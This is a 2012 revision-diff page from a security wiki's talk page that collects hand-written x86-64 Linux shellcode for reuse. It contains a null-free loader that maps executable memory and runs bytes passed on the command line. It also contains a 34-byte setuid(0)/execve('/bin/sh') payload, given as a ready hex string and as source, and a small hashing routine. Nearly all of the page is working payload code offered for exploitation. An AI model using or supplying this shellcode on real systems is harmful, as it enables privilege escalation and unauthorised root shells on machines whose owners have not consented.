Questions about this topic? Sign up to ask in the talk tab.

Difference between revisions of "Category talk:Shellcode"

From NetSec
Jump to: navigation, search
(Shellcode loader)
Line 100: Line 100:
 
  mov $0, %rdi
 
  mov $0, %rdi
 
  syscall</source>}}
 
  syscall</source>}}
 +
 +
===== Small one-way hashing algorithm =====
 +
{{code|text=<source lang="asm">
 +
compute_hash:
 +
    xor %rcx, %rcx
 +
    xor %rdx, %rdx
 +
 +
compute_hash_again:
 +
    subb (%rax, %rdx, 1), %cl
 +
    rol $0xa, %rcx
 +
    inc %rax
 +
    cmpb %dl, (%rax,%rdx,1)
 +
    jne compute_hash_again
 +
    ret
 +
</source>}}

Revision as of 14:51, 17 September 2012

Hey guys, thought we could use some collections of this stuff for re-use purposes. Lets only contribute things we wrote ourselves, no copy pasting others' codes please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcodes, and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

Shellcode loader

You shouldn't need to use this algorithm as a buffer overflow payload, but it's null-free just in case. For 64-bit linux kernel 3 systems.

Usage:

  as inject.s -o inject.o ; ld inject.o -o inject
  ./inject "$(echo -en "\x90\x90\x90")"   
  • The above example will execute 3 no ops.
 
.section .data
.section .text
.globl _start
 
_start:
 pop %rbx  # argc
 pop %rbx  # arg0
 pop %rbx  # arg1 pointer
 
 
 push $0x9
 pop %rax
 
 xor %rdi, %rdi
 push %rdi
 pop %rsi
 inc %rsi
 shl $0x12, %rsi
 
 push $0x7
 pop %rdx
 push $0x22
 pop %r10
 
 push %rdi
 push %rdi
 pop %r8
 pop %r9
 
 syscall   # The syscall for the mmap().
 
begin_inject:
 xor %rsi, %rsi
 push %rsi
 pop %rdi    
 
inject_loop:
 cmpb %dil, (%rbx, %rsi, 1)
 je inject_finished
 mov (%rbx, %rsi, 1), %r10
 mov %r10, (%rax,%rsi,1)
 inc %rsi
 jmp inject_loop
 
inject_finished:
 inc %rsi 
 movb $0xc3, (%rax, %rsi, 1)
 call *%rax
 
exit:
 push $60
 pop %rax
 xor %rdi, %rdi
 syscall
 
setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi
 mov $105, %rax
 syscall
 
# a function is f(%rdi,%rdx,%rsi)
 mov $59, %rax
                # execve(filename, argv, envp)
 push $0x00
 mov %rsp, %rdx # argv is null
 mov %rsp, %rsi # envp is null
 mov $0x0068732f6e69622f, %rcx
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax
 mov $0, %rdi
 syscall
Small one-way hashing algorithm
 
compute_hash:
     xor %rcx, %rcx
     xor %rdx, %rdx
 
compute_hash_again:
     subb (%rax, %rdx, 1), %cl
     rol $0xa, %rcx
     inc %rax
     cmpb %dl, (%rax,%rdx,1)
     jne compute_hash_again
     ret